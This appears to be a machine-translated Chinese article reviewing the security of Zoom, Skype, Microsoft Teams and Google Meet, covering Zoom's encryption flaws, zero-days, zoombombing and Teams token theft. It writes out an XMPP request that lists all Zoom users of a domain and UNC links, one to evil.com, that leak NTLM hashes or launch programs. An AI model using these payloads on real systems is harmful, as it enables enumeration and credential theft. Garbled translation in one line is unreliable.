视频通信服务安全

图片



组织视频会议服务的基本要求是质量,可靠性和安全性。并且,如果前两个要求对于所有主要参与者而言基本上是可比的,那么安全情况就大不相同了。在本文中,我们将介绍最常用的服务的运行情况:Zoom,Skype,Microsoft Teams和Google Meet。



自大流行开始以来,所有视频会议服务的用户数量都呈爆炸性增长:







图片

自大流行开始以来,Zoom Video的价值上涨份额。资料来源:Investing.com



然而,巨大的需求不仅导致公司股价上涨,而且清楚地表明了服务安全性的问题,出于某种原因,人们从来没有想过。其中一些问题与程序员的工作质量有关,并且可能导致远程执行代码。其他的则基于不适当的架构决策,这些决策为恶意使用服务提供了机会。



放大



Zoom Video确实打入了视频会议市场,并迅速成为领导者。不幸的是,领导层不仅体现在用户数量上,而且还表现在发现错误的数量上。这种情况令人沮丧,许多国家的军事和政府部门禁止雇员使用有问题的产品。大公司也效仿。考虑导致这些决定的Zoom漏洞。



加密问题



Zoom宣布所有视频通话均受到加密保护,但实际上并非一切都如此:服务确实使用了加密,但是客户端程序从作为Zoom的云基础架构一部分的“密钥管理系统”服务器之一请求会话密钥。这些服务器生成一个加密密钥,并将其发布给参加会议的订户- 所有会议参与者的一个密钥。



密钥从服务器到客户端的传输是通过TLS协议进行的,该协议也用于https。如果有任何会议参加者在其电话上使用Zoom,则加密密钥的副本也将发送到另一个Zoom电话连接器服务器。



一些密钥管理系统服务器位于中国,即使所有会议参与者都在其他国家/地区,也可以使用它们来发布密钥。人们非常担心中国政府可能会拦截加密的流量,然后在自愿和强制的基础上使用从提供商那里获得的密钥对它进行解密。



另一个加密问题与其实际实现有关:



  • 尽管文档指出使用了256位AES密钥,但它们的实际长度仅为128位。
  • 当加密结果部分保留原始数据的结构时,AES算法以ECB模式运行。


图片

使用ECB模式和其他AES模式进行图像加密的结果。来源:Wikipedia



$ 500K漏洞



2020年4月中旬,在Windows和macOS的Zoom客户端中发现了两个零日漏洞。 Windows客户端的RCE漏洞立即被以50万美元的价格出售。要利用此错误,攻击者必须致电受害者,或与受害者参加同一会议。



macOS客户端中的漏洞未提供此类功能,因此不太可能在实际攻击中使用它。



对未经授权的XMPP请求的响应



2020年4月,Zoom发现了另一个漏洞:使用特制XMPP请求任何人都可以获取属于任何域的所有服务用户的列表例如,您可以通过发送以下格式的XMPP请求来从usa.gov域中获取用户地址列表:



<iq id='{XXXX}' type='get' 
from='any_username@xmpp.zoom.us/ZoomChat_pc' xmlns='jabber:client'> 
	<query xmlns='zoom:iq:group' chunk='1' directory='1'> 
	<group id='usa.gov' version='0' option='0'/> 
	</query>
</iq>


该应用程序根本没有检查请求地址列表的用户的域。



控制macOS



在macOS的Zoom客户端中发现了两个漏洞,这些漏洞可能允许攻击者控制设备。



  1. Zoom安装程序使用了影子安装技术,恶意软件通常使用该影子安装技术来进行自身安装,而无需用户干预。本地的没有特权的攻击者可能已经将恶意代码注入到Zoom安装程序中,并获得了root特权。
  2. Zoom-, , . .


Windows客户端中的UNC漏洞在Windows



缩放客户端中发现的漏洞可能导致通过UNC链接泄露用户凭据。原因是Zoom Windows客户端将链接转换为UNC路径,因此,如果您将诸如\\ evil.com \ img \ kotik.jpg之类的链接发送至聊天,Windows将尝试使用SMB协议连接到该站点以打开文件。 kotik.jpg。远程站点将从本地计算机接收用户名和NTLM哈希,可以使用Hashcat或其他工具对其进行破解。



使用这种技术,几乎可以在本地计算机上运行任何程序。例如,链接\ 127.0.0.1 \ C $ \ windows \ system32 \ calc.exe将启动计算器。



视频通话记录泄漏



4月初,来自Zoom用户的个人视频通话记录出现在YouTube和Vimeo上。其中包括学校课程,心理治疗会议和医生咨询以及公司会议。

泄漏的原因是该服务为视频会议分配了开放标识符,而会议组织者没有使用密码保护对它们的访问。任何人都可以“合并”记录并酌情使用它们。



尊邦邦



在没有足够注意默认会议安全性设置而导致可怕后果的情况下,就是这种情况。要连接到Zoom中的任何视频会议,只要知道会议ID就足够了,然后恶作剧者开始大量使用此会议。他们参加了在线课程,并在那里练习了一种“机智”,例如,他们发起了一个带有色情视频的屏幕演示,或者在老师的屏幕上用淫秽的图像画了一个文档。



事实证明,问题不仅仅在于打乱在线课程。纽约时报记者在Reddit和4Chan论坛上发现了封闭的聊天和话题,其成员开展了大规模的活动来扰乱公共活动,酒精饮料匿名在线会议和其他Zoom会议。他们搜索了公共可用的登录凭据,然后邀请其他巨魔加入“乐趣”。



错误修复



大规模拒绝服务迫使Zoom的管理层采取了紧急措施。在4月初接受CNN采访时,Zoom首席执行官埃里克·袁(Eric Yuan)说,该公司发展太快,因此犯了一些错误。吸取教训后,他们又退后一步,专注于隐私和安全性。



根据90天安全计划,Zoom从2020年4月1日起停止了新功能的工作,并已开始解决已确定的问题并审核代码的安全性。

这些措施的结果是Zoom 5.0版本的发布,该版本将AES加密升级到256位,并在默认情况下实现了许多其他与安全性相关的改进。



Skype的



尽管用户数量迅速增长,但Skype仅在今年的信息安全新闻中出现过一次,即使在那时也没有出现漏洞。 2020年1月,一位前承包商告诉《卫报》,微软多年来一直在监听和处理Skype和Cortana用户的声音,而没有采取任何安全措施。但是,这最早是在2019年8月才被人们所了解,即使如此,微软代表也解释说,语音数据收集是为了确保和改善语音服务的操作而进行的:语音命令的搜索和识别,语音翻译和转录。



图片

在漏洞数据库中的搜索结果用于查询“ Skype”。资源:cve.mitre.org/cgi-bin/cvekey.cgi?keyword=Skype



至于漏洞,根据CVE数据库,在2020年Skype中未发现任何漏洞。



MS队



Microsoft非常重视其产品(包括MS Teams)的安全性(尽管存在相反的观点)。在2019-2020年,Teams中发现并修复了以下漏洞:



1. CVE-2019-5922 -Teams安装程序中的一个漏洞,由于安装程序未检查其中包含的DLL,因此攻击者可以利用该漏洞向他滑动恶意的DLL并获取目标系统的权限。在他的文件夹中。



2. Microsoft Teams平台的漏洞使得使用图片破坏用户帐户成为可能。



图片

使用图片对MS小组进行攻击的方案。资料来源:www.cyberark.com/resources/threat-research-blog/beware-of-the-gif-account-takeover-vulnerability-in-microsoft-teams



问题的根源是团队如何处理图像访问令牌。该平台使用两个令牌来认证用户:authtoken和skypetoken。Authtoken允许用户在Teams和Skype域中上载图像,并生成一个Skypetoken,用于对服务器进行身份验证,该服务器处理来自客户端的命令,例如读取或发送消息。



拦截了两个令牌的攻击者可以进行Teams API调用,并完全控制该帐户:



  • 阅读和发送消息,
  • 建立群组
  • 添加和删​​除用户,
  • 更改权限。


要拦截它,足以将受害者诱使到攻击者使用GIF文件控制的teams.microsoft.com域的子域中。然后,受害者的浏览器将向黑客发送一个身份验证令牌,在此之后,他将能够创建一个Skypetoken。



3. Tenable研究人员在“好评卡”组件和聊天窗口中发现了几个漏洞,这些漏洞允许向未经授权的设置更改注入代码以及窃取用户凭据。Microsoft尚未针对这些问题发布单独的建议,但已在新版本的应用程序中对其进行了修复。



谷歌见面



与类似的服务不同,Google Meet完全在浏览器中运行。由于此功能,过去两年来,来自Google的视频会议从未出现在信息安全新闻中。即使由大流行引起的用户数量增加了30倍,也没有发现影响其安全的漏洞。



我们的建议



使用任何软件都需要对安全负责,并且视频会议工具也不例外。以下是一些有助于保护您的在线会议的准则:



  1. 使用最新的软件版本,
  2. 仅从官方资源下载软件安装程序,
  3. 不要在Internet上发布会议ID,
  4. 通过两因素身份验证保护帐户,
  5. 仅允许授权用户连接会议,
  6. 活动开始后关闭新连接的可能性,
  7. 使组织者可以阻止或删除会议参加者,
  8. 使用现代化的防病毒解决方案,以提供针对新威胁和已知威胁的全面保护。


遵守视频会议在线卫生规则,即使在最困难的时候,也可以使您高效而安全地工作。



All Articles